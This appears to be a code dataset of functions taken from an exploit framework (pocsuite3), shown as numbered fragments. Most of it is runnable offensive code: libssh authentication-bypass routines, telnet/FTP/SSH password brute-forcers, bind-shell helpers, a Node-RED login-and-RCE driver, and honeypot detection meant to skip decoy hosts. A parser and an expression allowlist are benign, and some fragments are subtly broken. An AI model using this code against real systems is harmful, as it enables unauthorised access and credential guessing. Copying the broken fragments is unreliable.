if self.url.split('://')[0] != self.scheme:
self.url = self.build_url(self.url)
logger.warn(f'auto correct url: {mosaic(origin_url)} -> {mosaic(self.url)}')
if return_obj:
return res
content = str(res.headers).lower() + res.text.lower()
dork = dork.lower()
if dork not in content:
return False
if not honeypot_check:
return True
is_honeypot = False
# detect honeypot
# https://www.zoomeye.org/searchResult?q=%22GoAhead-Webs%22%20%2B%22Apache-Coyote%22
keyword = [
'goahead-webs',
'apache-coyote',
'upnp/',
'openresty',
'tomcat'
]
sin = 0
for k in keyword:
if k in content:
sin += 1
if sin >= 3:
logger.debug(f'honeypot: sin({sin}) >= 3')
is_honeypot = True
# maybe some false positives
elif len(re.findall('<title>(.*)</title>', content)) > 5:
logger.debug('honeypot: too many title')
is_honeypot = True
elif len(re.findall('basic realm=', content)) > 5:
logger.debug('honeypot: too many www-auth')
is_honeypot = True
elif len(re.findall('server: ', content)) > 5:
logger.debug('honeypot: too many server')
is_honeypot = True
if is_honeypot:
logger.warn(f'{mosaic(self.url)} is a honeypot.')
return not is_honeypot
def _shell(self):
"""
需要在用户自定义的Poc中进行重写
返回一个Output类实例
"""
raise NotImplementedError
def _attack(self):
"""
需要在用户自定义的Poc中进行重写
返回一个Output类实例
"""
raise NotImplementedError
def _verify(self):
"""
需要在用户自定义的Poc中进行重写
返回一个Output类实例
"""
raise NotImplementedError
def parse_output(self, result={}):
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet nothing returned')
return output
def _run(self):
"""
需要在用户自定义的Poc中进行重写
返回一个Output类实例
"""
raise NotImplementedError
def random_str(length=10, chars=string.ascii_letters + string.digits):
return ''.join(random.sample(chars, length))
def bind_shell(obj, rce_func='_rce', check=True):
if not (isinstance(obj, POCBase) and hasattr(obj, rce_func)
and callable(getattr(obj, rce_func))):
return False
conn = getattr(obj, rce_func)
if check:
flag = random_str(6).encode()
if flag not in read_results(conn, b'echo %s' % flag):
return False
start_listener(conn) | null |
161,761 | import os
import socket
import zlib
import pickle
import base64
import select
import telnetlib
import threading
from pocsuite3.lib.core.poc import POCBase
from pocsuite3.lib.utils import random_str
from pocsuite3.lib.core.common import check_port
from pocsuite3.lib.core.data import conf, logger
def read_results(conn, inputs):
if isinstance(conn, telnetlib.Telnet):
flag = random_str(6).encode()
inputs = inputs.strip() + b';' + flag + b'\n'
results = b''
conn.write(inputs)
count = 10
while count:
count -= 1
chunk = conn.read_until(random_str(6).encode(), 0.2)
if len(chunk) > 0:
results += chunk
if results.count(flag) >= 2:
# remove the Telnet input echo
results = results.split(inputs.strip())[-1]
results = os.linesep.encode().join(
results.split(flag)[0].splitlines()[0:-1])
return results.strip() + b'\n'
elif callable(conn):
results = conn(inputs.decode())
if not isinstance(results, bytes):
results = results.encode()
if results.strip() == b'':
results = b'COMMAND NO OUTPUT\n'
return results
elif isinstance(conn, socket.socket):
flag = random_str(6).encode()
inputs = inputs.strip() + b';' + flag + b'\n'
conn.send(inputs)
count = 10
results = b''
while count:
count -= 1
ready = select.select([conn], [], [], 0.2)
if ready[0]:
chunk = conn.recv(1024)
results += chunk
if results.count(flag) >= 2:
break
results = results.split(inputs.strip())[-1]
results = os.linesep.encode().join(
results.split(flag)[0].splitlines()[0:-1])
return results.strip() + b'\n'
return b'\n'
def start_listener(conn):
t = threading.Thread(target=flow_redirect,
name="bind-listener-thread",
args=[conn])
t.setDaemon(True)
t.start()
def random_str(length=10, chars=string.ascii_letters + string.digits):
return ''.join(random.sample(chars, length))
def check_port(ip, port):
res = socket.getaddrinfo(ip, port, socket.AF_UNSPEC, socket.SOCK_STREAM)
af, sock_type, proto, canonname, sa = res[0]
s = socket.socket(af, sock_type, proto)
try:
s.connect(sa)
s.shutdown(2)
return True
except socket.error:
return False
finally:
s.close()
logger = LOGGER
def bind_tcp_shell(host, port, check=True):
if not check_port(host, port):
return False
try:
s = socket.socket()
s.connect((host, port))
if check:
flag = random_str(6).encode()
if flag not in read_results(s, b'echo %s' % flag):
return False
start_listener(s)
except Exception as e:
logger.error(str(e)) | null |
161,762 | import os
import socket
import zlib
import pickle
import base64
import select
import telnetlib
import threading
from pocsuite3.lib.core.poc import POCBase
from pocsuite3.lib.utils import random_str
from pocsuite3.lib.core.common import check_port
from pocsuite3.lib.core.data import conf, logger
def read_results(conn, inputs):
def start_listener(conn):
def random_str(length=10, chars=string.ascii_letters + string.digits):
def check_port(ip, port):
logger = LOGGER
def bind_telnet_shell(host, port, user, pwd, check=True):
if not check_port(host, port):
return False
try:
tn = telnetlib.Telnet(host, port)
tn.expect([b'Login: ', b'login: '], 10)
tn.write(user.encode() + b'\n')
tn.expect([b'Password: ', b'password: '], 10)
tn.write(pwd.encode() + b'\n')
tn.write(b'\n')
if check:
flag = random_str(6).encode()
if flag not in read_results(tn, b'echo %s' % flag):
return False
start_listener(tn)
except Exception as e:
logger.error(str(e)) | null |
161,763 | import os
import sys
import threading
import time
import traceback
from pocsuite3.lib.core.option import init
from pocsuite3.lib.core.option import init_options
from pocsuite3.lib.core.exception import PocsuiteUserQuitException, PocsuiteSystemException
from pocsuite3.lib.core.exception import PocsuiteShellQuitException
from pocsuite3.lib.core.common import set_paths
from pocsuite3.lib.core.common import banner
from pocsuite3.lib.core.common import data_to_stdout
from pocsuite3.lib.core.data import logger
from pocsuite3.lib.parse.cmd import cmd_line_parser
from pocsuite3.lib.controller.controller import start
def module_path():
logger = LOGGER
def check_environment():
try:
os.path.isdir(module_path())
except Exception:
err_msg = "your system does not properly handle non-ASCII paths. "
err_msg += "Please move the pocsuite's directory to the other location"
logger.critical(err_msg)
raise SystemExit | null |
161,764 | import itertools
import queue
import socket
import telnetlib
from pocsuite3.api import POCBase, Output, register_poc, logger, POC_CATEGORY, VUL_TYPE
from pocsuite3.lib.core.data import paths
from pocsuite3.lib.core.threads import run_threads
def port_check(host, port=23):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect_ex((host, int(port)))
if connect == 0:
return True
else:
s.close()
return False
def task_init(host, port):
tmp = set()
for username, password in get_word_list():
if username not in tmp:
task_queue.put((host, port, username.strip(), ''))
tmp.add(username)
task_queue.put((host, port, username.strip(), password.strip()))
def task_thread():
while not task_queue.empty():
host, port, username, password = task_queue.get()
logger.info('try burst {}:{} use username:{} password:{}'.format(
host, port, username, password))
if telnet_login(host, port, username, password):
with task_queue.mutex:
task_queue.queue.clear()
result_queue.put((username, password))
def run_threads(num_threads, thread_function, args: tuple = (), forward_exception=True, start_msg=True):
threads = []
kb.multi_thread_mode = True
kb.thread_continue = True
kb.thread_exception = False
try:
if num_threads > 1:
if start_msg:
info_msg = "starting {0} threads".format(num_threads)
logger.info(info_msg)
if num_threads > MAX_NUMBER_OF_THREADS:
warn_msg = f"starting {num_threads} threads, more than MAX_NUMBER_OF_THREADS: {MAX_NUMBER_OF_THREADS}"
logger.warn(warn_msg)
else:
thread_function(*args)
return
# Start the threads
for num_threads in range(num_threads):
thread = threading.Thread(target=exception_handled_function, name=str(num_threads),
args=(thread_function, args))
thread.setDaemon(True)
try:
thread.start()
except Exception as ex:
err_msg = "error occurred while starting new thread ('{0}')".format(str(ex))
logger.critical(err_msg)
break
threads.append(thread)
# And wait for them to all finish
alive = True
while alive:
alive = False
for thread in threads:
if thread.is_alive():
alive = True
time.sleep(0.1)
except (KeyboardInterrupt, PocsuiteUserQuitException):
kb.thread_continue = False
kb.thread_exception = True
logger.info("user aborted (Ctrl+C was pressed multiple times")
if forward_exception:
return
except (PocsuiteConnectionException, PocsuiteValueException) as ex:
kb.thread_exception = True
logger.error("thread {0}: {1}".format(threading.currentThread().getName(), str(ex)))
if conf.verbose > 1:
traceback.print_exc()
except Exception as ex:
kb.thread_exception = True
logger.error("thread {0}: {1}".format(threading.currentThread().getName(), str(ex)))
traceback.print_exc()
finally:
kb.multi_thread_mode = False
kb.thread_continue = True
kb.thread_exception = False
def telnet_burst(host, port):
if not port_check(host, port):
return
try:
task_init(host, port)
run_threads(1, task_thread)
except Exception:
pass | null |
161,765 | import ftplib
import itertools
import queue
import socket
from pocsuite3.api import POCBase, Output, register_poc, logger, POC_CATEGORY, VUL_TYPE
from pocsuite3.lib.core.data import paths
from pocsuite3.lib.core.threads import run_threads
result_queue = queue.Queue()
def port_check(host, port=21):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect_ex((host, int(port)))
if connect == 0:
return True
else:
s.close()
return False
def anonymous_login(host, port):
return ftp_login(host, port, anonymous=True)
def task_init(host, port):
for username, password in get_word_list():
task_queue.put((host, port, username.strip(), password.strip()))
def task_thread():
while not task_queue.empty():
host, port, username, password = task_queue.get()
logger.info('try burst {}:{} use username:{} password:{}'.format(
host, port, username, password))
if ftp_login(host, port, username, password):
with task_queue.mutex:
task_queue.queue.clear()
result_queue.put((username, password))
def run_threads(num_threads, thread_function, args: tuple = (), forward_exception=True, start_msg=True):
threads = []
kb.multi_thread_mode = True
kb.thread_continue = True
kb.thread_exception = False
try:
if num_threads > 1:
if start_msg:
info_msg = "starting {0} threads".format(num_threads)
logger.info(info_msg)
if num_threads > MAX_NUMBER_OF_THREADS:
warn_msg = f"starting {num_threads} threads, more than MAX_NUMBER_OF_THREADS: {MAX_NUMBER_OF_THREADS}"
logger.warn(warn_msg)
else:
thread_function(*args)
return
# Start the threads
for num_threads in range(num_threads):
thread = threading.Thread(target=exception_handled_function, name=str(num_threads),
args=(thread_function, args))
thread.setDaemon(True)
try:
thread.start()
except Exception as ex:
err_msg = "error occurred while starting new thread ('{0}')".format(str(ex))
logger.critical(err_msg)
break
threads.append(thread)
# And wait for them to all finish
alive = True
while alive:
alive = False
for thread in threads:
if thread.is_alive():
alive = True
time.sleep(0.1)
except (KeyboardInterrupt, PocsuiteUserQuitException):
kb.thread_continue = False
kb.thread_exception = True
logger.info("user aborted (Ctrl+C was pressed multiple times")
if forward_exception:
return
except (PocsuiteConnectionException, PocsuiteValueException) as ex:
kb.thread_exception = True
logger.error("thread {0}: {1}".format(threading.currentThread().getName(), str(ex)))
if conf.verbose > 1:
traceback.print_exc()
except Exception as ex:
kb.thread_exception = True
logger.error("thread {0}: {1}".format(threading.currentThread().getName(), str(ex)))
traceback.print_exc()
finally:
kb.multi_thread_mode = False
kb.thread_continue = True
kb.thread_exception = False
def ftp_burst(host, port):
if not port_check(host, port):
return
if anonymous_login(host, port):
logger.info('try burst {}:{} use username:{} password:{}'.format(
host, port, 'anonymous', '<empty>'))
result_queue.put(('anonymous', '<empty>'))
return
try:
task_init(host, port)
run_threads(4, task_thread)
except Exception:
pass | null |
161,766 | import asyncio
import json
import re
import websockets
from pocsuite3.api import POCBase, Output, register_poc, logger, requests, VUL_TYPE
from pocsuite3.api import REVERSE_PAYLOAD, POC_CATEGORY
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.lib.utils import random_str
def need_auth(url):
def login(url, username="admin", password="password"):
async def exploit(url, command, shell=False, access_token=None):
def start(url, command, username, password, shell=False):
if need_auth(url):
print("[+] Node-RED requires authentication.")
if username is None and password is None:
print("[+] Trying default credentials.")
access_token = login(url)
else:
print("[+] Trying provided credentials.")
access_token = login(url, username=username, password=password)
if access_token is None:
print("[!] An error occured during login procedure. Wrong creds ?")
return
else:
print("[+] Successfully authenticated over HTTP.")
return asyncio.get_event_loop().run_until_complete(exploit(url, command, shell, access_token))
else:
print("[+] Node-RED does not require authentication.")
return asyncio.get_event_loop().run_until_complete(exploit(url, command, shell)) | null |
161,767 | import os
import socket
import paramiko
from pocsuite3.api import POCBase, Output, register_poc, logger, POC_CATEGORY, VUL_TYPE
def password_auth_bypass_test(hostname, port):
bufsize = 2048
command = 'whoami'
sock = socket.socket()
try:
sock.connect((hostname, int(port)))
message = paramiko.message.Message()
transport = paramiko.transport.Transport(sock)
transport.start_client()
message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
transport._send_message(message)
client = transport.open_session(timeout=10)
client.exec_command(command)
stdout = client.makefile("rb", bufsize)
stderr = client.makefile_stderr("rb", bufsize)
cmd_out = stdout.read().decode() + stderr.read().decode()
print(cmd_out)
return True if 'root' in cmd_out else False
except paramiko.SSHException:
logger.debug("TCPForwarding disabled on remote server can't connect. Not Vulnerable")
return False
except socket.error:
logger.debug("Unable to connect.")
return False | null |
161,768 | import os
import socket
import paramiko
from pocsuite3.api import POCBase, Output, register_poc, logger, POC_CATEGORY, VUL_TYPE
def auth_accept(*args, **kwargs):
new_auth_accept = paramiko.auth_handler.AuthHandler._client_handler_table[paramiko.common.MSG_USERAUTH_SUCCESS]
return new_auth_accept(*args, **kwargs)
def fake_key_bypass_test(hostname, port, username='root', keyfile=None, command='whoami'):
try:
if keyfile is None:
keyfile = os.path.join(os.environ['HOME'], '.ssh', 'id_rsa')
paramiko.auth_handler.AuthHandler._server_handler_table.update(
{paramiko.common.MSG_USERAUTH_REQUEST: auth_accept})
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(hostname, port=int(port), username=username, password="", pkey=None, key_filename=keyfile)
stdin, stdout, stderr = client.exec_command(command)
cmd_output = stdout.read()
client.close()
return True if cmd_output == 'root' else False
except FileNotFoundError:
logger.debug("Generate a keyfile for tool to bypass remote/local server credentials.")
return False
except paramiko.SSHException:
logger.debug("TCPForwarding disabled on remote server can't connect. Not Vulnerable")
return False
except socket.error:
logger.debug("Unable to connect.")
return False | null |
161,769 | import itertools
import logging
import queue
import socket
from collections import OrderedDict
import paramiko
from pocsuite3.api import POCBase, Output, register_poc, logger, POC_CATEGORY, VUL_TYPE
from pocsuite3.lib.core.data import paths
from pocsuite3.lib.core.interpreter_option import OptInteger
from pocsuite3.lib.core.threads import run_threads
def port_check(host, port=22):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect_ex((host, int(port)))
if connect == 0:
return True
else:
s.close()
return False
def task_init(host, port, task_queue, reqult_queue):
for username, password in get_word_list():
task_queue.put((host, port, username.strip(), password.strip()))
def task_thread(task_queue, result_queue):
while not task_queue.empty():
host, port, username, password = task_queue.get()
logger.info('try burst {}:{} use username:{} password:{}'.format(
host, port, username, password))
if ssh_login(host, port, username, password):
with task_queue.mutex:
task_queue.queue.clear()
result_queue.put((username, password))
def run_threads(num_threads, thread_function, args: tuple = (), forward_exception=True, start_msg=True):
threads = []
kb.multi_thread_mode = True
kb.thread_continue = True
kb.thread_exception = False
try:
if num_threads > 1:
if start_msg:
info_msg = "starting {0} threads".format(num_threads)
logger.info(info_msg)
if num_threads > MAX_NUMBER_OF_THREADS:
warn_msg = f"starting {num_threads} threads, more than MAX_NUMBER_OF_THREADS: {MAX_NUMBER_OF_THREADS}"
logger.warn(warn_msg)
else:
thread_function(*args)
return
# Start the threads
for num_threads in range(num_threads):
thread = threading.Thread(target=exception_handled_function, name=str(num_threads),
args=(thread_function, args))
thread.setDaemon(True)
try:
thread.start()
except Exception as ex:
err_msg = "error occurred while starting new thread ('{0}')".format(str(ex))
logger.critical(err_msg)
break
threads.append(thread)
# And wait for them to all finish
alive = True
while alive:
alive = False
for thread in threads:
if thread.is_alive():
alive = True
time.sleep(0.1)
except (KeyboardInterrupt, PocsuiteUserQuitException):
kb.thread_continue = False
kb.thread_exception = True
logger.info("user aborted (Ctrl+C was pressed multiple times")
if forward_exception:
return
except (PocsuiteConnectionException, PocsuiteValueException) as ex:
kb.thread_exception = True
logger.error("thread {0}: {1}".format(threading.currentThread().getName(), str(ex)))
if conf.verbose > 1:
traceback.print_exc()
except Exception as ex:
kb.thread_exception = True
logger.error("thread {0}: {1}".format(threading.currentThread().getName(), str(ex)))
traceback.print_exc()
finally:
kb.multi_thread_mode = False
kb.thread_continue = True
kb.thread_exception = False
def ssh_burst(host, port, task_queue, result_queue, ssh_burst_threads):
log = paramiko.util.logging.getLogger()
log.setLevel(logging.CRITICAL)
if not port_check(host, port):
logger.warning("{}:{} is unreachable".format(host, port))
return
try:
task_init(host, port, task_queue, result_queue)
run_threads(ssh_burst_threads, task_thread, args=(task_queue, result_queue))
except Exception:
pass | null |
161,770 | from collections import OrderedDict
from pocsuite3.api import (
Output,
POCBase,
POC_CATEGORY,
register_poc,
requests,
VUL_TYPE,
get_listener_ip,
get_listener_port,
)
from pocsuite3.lib.core.interpreter_option import (
OptString,
OptDict,
OptIP,
OptPort,
OptBool,
OptInteger,
OptFloat,
OptItems,
)
from pocsuite3.modules.listener import REVERSE_PAYLOAD
def other_fuc():
pass | null |
161,771 | from collections import OrderedDict
from pocsuite3.api import (
Output,
POCBase,
POC_CATEGORY,
register_poc,
requests,
VUL_TYPE,
get_listener_ip,
get_listener_port,
)
from pocsuite3.lib.core.interpreter_option import (
OptString,
OptDict,
OptIP,
OptPort,
OptBool,
OptInteger,
OptFloat,
OptItems,
)
from pocsuite3.modules.listener import REVERSE_PAYLOAD
def other_utils_func():
pass | null |
161,772 | from pocsuite3.lib.utils import urlparse
class URL:
def __init__(self, schema: bytes, host: bytes, port, path: bytes,
query: bytes, fragment: bytes, userinfo: bytes):
self.schema = schema.decode('utf-8')
self.host = host.decode('utf-8')
if port and port != 0:
self.port = port
else:
if schema == b'https':
self.port = 443
else:
self.port = 80
self.path = path.decode('utf-8') if path else ''
self.query = query.decode('utf-8') if query else None
self.fragment = fragment.decode('utf-8') if fragment else None
self.userinfo = userinfo.decode('utf-8') if userinfo else None
self.netloc = self.schema + '://' + self.host + ':' + str(self.port)
def raw(self):
return self.netloc + (self.path or '') + (self.query or '') + (self.fragment or '')
def __repr__(self):
return ('<URL schema: {!r}, host: {!r}, port: {!r}, path: {!r}, '
'query: {!r}, fragment: {!r}, userinfo: {!r}>'
.format(self.schema, self.host, self.port, self.path, self.query, self.fragment, self.userinfo))
def urlparse(address):
# https://stackoverflow.com/questions/50499273/urlparse-fails-with-simple-url
try:
ip = ip_address(address)
if ip.version == 4:
return urllib.parse.urlparse(f'tcp://{address}')
elif ip.version == 6:
return urllib.parse.urlparse(f'tcp://[{address}]')
except ValueError:
pass
if not re.search(r'^[A-Za-z0-9+.\-]+://', address):
address = f'tcp://{address}'
return urllib.parse.urlparse(address)
def parse_url(url):
try:
parsed = urlparse(url)
userinfo = b'{parsed.username}:{parsed.password}'
return URL(parsed.scheme, parsed.hostname, parsed.port, parsed.path, parsed.query, parsed.fragment, userinfo)
except Exception:
raise("invalid url {!r}".format(url)) | null |
161,773 | import argparse
import os
import sys
from pocsuite3.lib.core.common import data_to_stdout
from pocsuite3.lib.core.settings import IS_WIN, CMD_PARSE_WHITELIST
def data_to_stdout(data, bold=False):
"""
Writes text to the stdout (console) stream
"""
if not conf.get('quiet', False):
message = ""
if isinstance(data, str):
message = stdout_encode(data)
else:
message = data
sys.stdout.write(set_color(message, bold))
try:
sys.stdout.flush()
except IOError:
pass
return
IS_WIN = True if (sys.platform in ["win32", "cygwin"] or os.name == "nt") else False
CMD_PARSE_WHITELIST = [
"help",
"version",
"update",
"new",
"url",
"url_file",
"ports",
"skip_target_port",
"file",
"poc_keyword",
"poc_list",
"verify",
"attack",
"shell",
"cookie",
"host",
"referer",
"user-agent",
"proxy",
"proxy-cred",
"timeout",
"retry",
"delay",
"headers",
"http-debug",
"ceye-token",
"oob-server",
"oob-token",
"seebug-token",
"zoomeye-token",
"shodan-token",
"fofa-user",
"fofa-token",
"quake-token",
"hunter-token",
"censys-uid",
"censys-secret",
"dork",
"dork-zoomeye",
"dork-shodan",
"dork-fofa",
"dork-quake",
"dork-hunter",
"dork-censys",
"max-page",
"search-type",
"vul-keyword",
"ssv-id",
"lhost",
"lport",
"tls",
"comparison",
"dork-b64",
"output_path",
"plugins",
"pocs-path",
"threads",
"batch",
"requires",
"quiet",
"ppt",
"pcap",
"rule",
"rule-req",
"rule-filename",
"no-check",
"options",
# docker
"docker-start",
"docker-port",
"docker-env",
"docker-volume",
"docker-only",
# other
"poc",
"verbose",
"mode",
"api",
"connect_back_host",
"connect_back_port",
"session-reuse",
"session-reuse-num",
# web hook
"dingtalk-token",
"dingtalk-secret",
"wx-work-key"
]
The provided code snippet includes necessary dependencies for implementing the `cmd_line_parser` function. Write a Python function `def cmd_line_parser(argv=None)` to solve the following problem:
This function parses the command line parameters and arguments
Here is the function:
def cmd_line_parser(argv=None):
"""
This function parses the command line parameters and arguments
"""
if not argv:
argv = sys.argv
_ = os.path.basename(argv[0])
usage = "pocsuite [options]"
parser = argparse.ArgumentParser(prog='Pocsuite3', usage=usage)
try:
parser.add_argument("--version", dest="show_version", action="store_true",
help="Show program's version number and exit")
parser.add_argument("--update", dest="update_all", action="store_true",
help="Update Pocsuite3")
parser.add_argument("-n", "--new", dest="new", action="store_true", help="Create a PoC template")
parser.add_argument("-v", dest="verbose", type=int, default=1, choices=list(range(7)),
help="Verbosity level: 0-6 (default 1)")
# Target options
target = parser.add_argument_group('Target', "At least one of these "
"options has to be provided to define the target(s)")
target.add_argument("-u", "--url", dest="url", nargs='+',
help="Target URL/CIDR (e.g. \"http://www.site.com/vuln.php?id=1\")")
target.add_argument("-f", "--file", dest="url_file",
help="Scan multiple targets given in a textual file (one per line)")
target.add_argument("-p", "--ports", dest="ports",
help="add additional port to each target ([proto:]port, e.g. 8080,https:10000)")
target.add_argument("-s", dest="skip_target_port", action="store_true",
help="Skip target's port, only use additional port")
target.add_argument("-r", dest="poc", nargs='+', help="Load PoC file from local or remote from seebug website")
target.add_argument("-k", dest="poc_keyword", help="Filter PoC by keyword, e.g. ecshop")
target.add_argument("-c", dest="configFile", help="Load options from a configuration INI file")
target.add_argument("-l", dest="poc_list", action="store_true", help="Show all PoC file from local")
# Mode options
mode = parser.add_argument_group("Mode", "Pocsuite running mode options")
mode.add_argument("--verify", dest="mode", default='verify', action="store_const", const='verify',
help="Run poc with verify mode")
mode.add_argument("--attack", dest="mode", action="store_const", const='attack',
help="Run poc with attack mode")
mode.add_argument("--shell", dest="mode", action="store_const", const='shell',
help="Run poc with shell mode")
# Requests options
request = parser.add_argument_group("Request", "Network request options")
request.add_argument("--cookie", dest="cookie", help="HTTP Cookie header value")
request.add_argument("--host", dest="host", help="HTTP Host header value")
request.add_argument("--referer", dest="referer", help="HTTP Referer header value")
request.add_argument("--user-agent", dest="agent", help="HTTP User-Agent header value (default random)")
request.add_argument("--proxy", dest="proxy",
help="Use a proxy to connect to the target URL (protocol://host:port)")
request.add_argument("--proxy-cred", dest="proxy_cred", help="Proxy authentication credentials (name:password)")
request.add_argument("--timeout", dest="timeout", type=float, default=10,
help="Seconds to wait before timeout connection (default 10)")
request.add_argument("--retry", dest="retry", type=int, default=0, help="Time out retrials times (default 0)")
request.add_argument("--delay", dest="delay", help="Delay between two request of one thread")
request.add_argument("--headers", dest="headers", help="Extra headers (e.g. \"key1: value1\\nkey2: value2\")")
request.add_argument("--http-debug", dest="http_debug", type=int, default=0, help="HTTP debug level (default 0)")
request.add_argument("--session-reuse", dest="requests_session_reuse", action="store_true",
help="Enable requests session reuse")
request.add_argument("--session-reuse-num", type=int, dest="requests_session_reuse_num", default=10,
help="Requests session reuse number")
# Account options
group = parser.add_argument_group("Account", "Account options")
group.add_argument("--ceye-token", dest="ceye_token", help="CEye token")
group.add_argument("--oob-server", dest="oob_server",
help="Interactsh server to use (default \"interact.sh\")")
group.add_argument("--oob-token", dest="oob_token",
help="Authentication token to connect protected interactsh server")
group.add_argument("--seebug-token", dest="seebug_token", help="Seebug token")
group.add_argument("--zoomeye-token", dest="zoomeye_token", help="ZoomEye token")
group.add_argument("--shodan-token", dest="shodan_token", help="Shodan token")
group.add_argument("--fofa-user", dest="fofa_user", help="Fofa user")
group.add_argument("--fofa-token", dest="fofa_token", help="Fofa token")
group.add_argument("--quake-token", dest="quake_token", help="Quake token")
group.add_argument("--hunter-token", dest="hunter_token", help="Hunter token")
group.add_argument("--censys-uid", dest="censys_uid", help="Censys uid")
group.add_argument("--censys-secret", dest="censys_secret", help="Censys secret")
# Modules options
modules = parser.add_argument_group(
"Modules", "Modules options")
modules.add_argument("--dork", dest="dork", action="store", default=None,
help="Zoomeye dork used for search")
modules.add_argument("--dork-zoomeye", dest="dork_zoomeye", action="store", default=None,
help="Zoomeye dork used for search")
modules.add_argument("--dork-shodan", dest="dork_shodan", action="store", default=None,
help="Shodan dork used for search")
modules.add_argument("--dork-fofa", dest="dork_fofa", action="store", default=None,
help="Fofa dork used for search")
modules.add_argument("--dork-quake", dest="dork_quake", action="store", default=None,
help="Quake dork used for search")
modules.add_argument("--dork-hunter", dest="dork_hunter", action="store", default=None,
help="Hunter dork used for search")
modules.add_argument("--dork-censys", dest="dork_censys", action="store", default=None,
help="Censys dork used for search")
modules.add_argument("--max-page", dest="max_page", type=int, default=1,
help="Max page used in search API")
modules.add_argument("--search-type", dest="search_type", action="store", default='host',
help="search type used in search API, web or host")
modules.add_argument("--vul-keyword", dest="vul_keyword", action="store", default=None,
help="Seebug keyword used for search")
modules.add_argument("--ssv-id", dest="ssvid", action="store", default=None,
help="Seebug SSVID number for target PoC")
modules.add_argument("--lhost", dest="connect_back_host", action="store", default=None,
help="Connect back host for target PoC in shell mode")
modules.add_argument("--lport", dest="connect_back_port", action="store", default=None,
help="Connect back port for target PoC in shell mode")
modules.add_argument("--tls", dest="enable_tls_listener", action="store_true", default=False,
help="Enable TLS listener in shell mode")
modules.add_argument("--comparison", dest="comparison", help="Compare popular web search engines",
action="store_true",
default=False)
modules.add_argument("--dork-b64", dest="dork_b64", help="Whether dork is in base64 format",
action="store_true",
default=False)
# Optimization options
optimization = parser.add_argument_group("Optimization", "Optimization options")
optimization.add_argument("-o", "--output", dest="output_path", help="Output file to write (JSON Lines format)")
optimization.add_argument("--plugins", dest="plugins", action="store", default=None,
help="Load plugins to execute")
optimization.add_argument("--pocs-path", dest="pocs_path", action="store", default=None,
help="User defined poc scripts path")
optimization.add_argument("--threads", dest="threads", type=int, default=150,
help="Max number of concurrent network requests (default 150)")
optimization.add_argument("--batch", dest="batch",
help="Automatically choose defaut choice without asking")
optimization.add_argument("--requires", dest="check_requires", action="store_true", default=False,
help="Check install_requires")
optimization.add_argument("--quiet", dest="quiet", action="store_true", default=False,
help="Activate quiet mode, working without logger")
optimization.add_argument("--ppt", dest="ppt", action="store_true", default=False,
help="Hiden sensitive information when published to the network")
optimization.add_argument("--pcap", dest="pcap", action="store_true", default=False,
help="use scapy capture flow")
optimization.add_argument("--rule", dest="rule", action="store_true", default=False,
help="export suricata rules, default export reqeust and response")
optimization.add_argument("--rule-req", dest="rule_req", action="store_true", default=False,
help="only export request rule")
optimization.add_argument("--rule-filename", dest="rule_filename", action="store", default=False,
help="Specify the name of the export rule file")
optimization.add_argument("--no-check", dest="no_check", action="store_true", default=False,
help="Disable URL protocol correction and honeypot check")
# docker options
docker_environment = parser.add_argument_group("Docker Environment", "Docker Environment options")
docker_environment.add_argument("--docker-start", dest="docker_start", action="store_true",
default=False, help="Run the docker for PoC")
docker_environment.add_argument("--docker-port", dest="docker_port", action="append",
default=[], help="Publish a container's port(s) to the host")
docker_environment.add_argument("--docker-volume", dest="docker_volume", action="append",
default=[], help="Bind mount a volume")
docker_environment.add_argument("--docker-env", dest="docker_env", action="append", default=[],
help="Set environment variables")
docker_environment.add_argument("--docker-only", dest="docker_only", action="store_true",
default=False, help="Only run docker environment")
# web hook options
web_hook = parser.add_argument_group('Web Hook', "Web Hook Options")
web_hook.add_argument("--dingtalk-token", dest="dingtalk_token", help="Dingtalk access token")
web_hook.add_argument("--dingtalk-secret", dest="dingtalk_secret", help="Dingtalk secret")
web_hook.add_argument("--wx-work-key", dest="wx_work_key", help="Weixin Work key")
# Diy options
diy = parser.add_argument_group("Poc options", "definition options for PoC")
diy.add_argument("--options", dest="show_options", action="store_true", default=False,
help="Show all definition options")
for line in argv:
if line.startswith("--"):
if line[2:] not in CMD_PARSE_WHITELIST:
diy.add_argument(line)
args = parser.parse_args()
return args
except SystemExit:
# Protection against Windows dummy double clicking
if IS_WIN:
data_to_stdout("\nPress Enter to continue...")
input()
raise | This function parses the command line parameters and arguments |
161,774 | import re
from ast import (
Module,
parse,
walk,
)
from pocsuite3.lib.core.log import LOGGER as logger
def _check_expression(text, allowed_variables=None):
"""
>>> allowed_variables = ["c1", "c2", "c3", "c4", "c5"]
>>> _check_expression("c1", allowed_variables)
True
>>> _check_expression("eval('1+1')", allowed_variables)
False
>>> _check_expression("import sys", allowed_variables)
False
>>> _check_expression("[].__str__", allowed_variables)
False
>>> _check_expression("__builtins__", allowed_variables)
False
>>> _check_expression("'x' in globals", allowed_variables)
False
>>> _check_expression("'x' in [1,2,3]", allowed_variables)
True
>>> _check_expression("c3=='chr1' and c5>5", allowed_variables)
True
>>> _check_expression("c3=='chr1' and d5>5", allowed_variables) # Invalid d5 reference
False
>>> _check_expression("c3=='chr1' and c5>5 or exec", allowed_variables)
False
>>> _check_expression("type(c1) != type(1)", allowed_variables)
True
>>> _check_expression("c1.split(',')[1] == '1'", allowed_variables)
True
>>> _check_expression("exec 1", allowed_variables)
False
>>> _check_expression("str(c2) in [\\\"a\\\",\\\"b\\\"]", allowed_variables)
True
"""
if allowed_variables is None:
allowed_variables = []
try:
module = parse(text)
except SyntaxError:
return False
if not isinstance(module, Module):
return False
statements = module.body
if not len(statements) == 1:
return False
expression = statements[0]
if expression.__class__.__name__ != "Expr":
return False
for ast_node in walk(expression):
ast_node_class = ast_node.__class__.__name__
# Toss out everything that is not a "simple" expression,
# imports, error handling, etc...
if ast_node_class not in AST_NODE_TYPE_ALLOWLIST:
return False
# White-list more potentially dangerous types AST elements.
if ast_node_class == "Name":
# In order to prevent loading 'exec', 'eval', etc...
# put string restriction on names allowed.
if not _check_name(ast_node, allowed_variables):
return False
# Check only valid, white-listed functions are called.
elif ast_node_class == "Call":
if not _check_call(ast_node, allowed_variables):
